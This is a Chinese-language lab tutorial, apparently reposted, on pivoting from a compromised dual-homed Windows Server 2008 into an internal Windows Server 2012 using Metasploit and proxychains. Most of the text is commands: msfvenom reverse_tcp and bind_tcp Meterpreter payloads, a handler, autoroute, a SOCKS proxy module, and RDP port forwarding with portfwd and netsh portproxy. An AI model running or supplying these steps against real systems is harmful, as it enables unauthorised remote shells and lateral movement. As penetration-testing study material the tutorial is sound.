msf+proxychains組合搭建socks5隧道


0x00 實驗環境

攻擊機:win(192.168.43.10)+kali(192.168.43.243)

受害機

winserver2008(IP:192.168.43.146、192.168.127.157;雙網卡,一個公網一個內網)

winserver2012(IP:192.168.127.160;僅主機:一個內網)

 

0x01 實驗效果

在已經拿到winserver2008服務器的前提下,通過msf與proxychains搭建隧道能通往winserver2012的隧道,獲取winserver2012的服務器權限。

(1)假設已拿到winserver2008的服務器權限,用msf做演示:

msf生成exe控winserver2008:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.234 LPORT=12345 -f exe > ./test.exe 
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.43.234
set LPORT 12345
run

 

 

此時查看一下路由

route

 

 

然后添加路由

run autoroute -s 192.168.127.0

 

然后查看添加的路由
run autoroute -p

 

 

background

 

然后搜索可以做代理的模塊,並使用它:

 

use auxiliary/server/socks_proxy

 

 

show options
set username admin
set password admin

 

 

 

 然后run:

run

 

 

#使用proxychains或者proxifier測試一下是否成功:

(1)proxifier是成功的:

 

 

 (2)使用proxychains測試——需要先自行安裝:

sudo apt-get install proxychains

 

發現是可以使用的:

 

 上述即為msf作代理的方法。

 

(3)小tips:

如果內網的服務器3389端口不出網,可以使用msf轉發至別的端口:

首先代理啟動msf:

 

proxychains msfconsole 

 

 

 

注:可獲取192.168.127.160服務器權限:

msfvenom -p windows/meterpreter/bind_tcp LPORT=9797 -f exe > ./t.exe

 

 

 

 注:設置代理結束后,可在43.x的shell的基礎上進行端口轉發,只要能訪問到127.160主機的3389端口就能將3389端口轉發出來:

portfwd add -l 9837 -r 192.168.127.160 -p 3389

 kali即可直接訪問登錄127.160主機:

 

 

注:在反向連接的情況下,需要做端口映射:

https://www.cnblogs.com/xiaozi/p/9453944.html

假定需要通過192.168.127.160的3389端口轉發到8787端口,則需要在192.168.43.157主機的命令行輸入如下語句:
netsh interface portproxy add v4tov4 listenport=8787 listenaddress=192.168.127.160 connectport=3389 connectaddress=192.168.127.160

生成一個8081的木馬,在43.157主機本機的shell內執行端口映射,映射8081端口到9808:


netsh interface portproxy add v4tov4 listenport=8081 listenaddress=0.0.0.0 connectport=9809 connectaddress=192.168.127.157
netsh interface portproxy delete v4tov4 listenport=8081 listenaddress=192.168.127.157
netsh interface portproxy show all


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM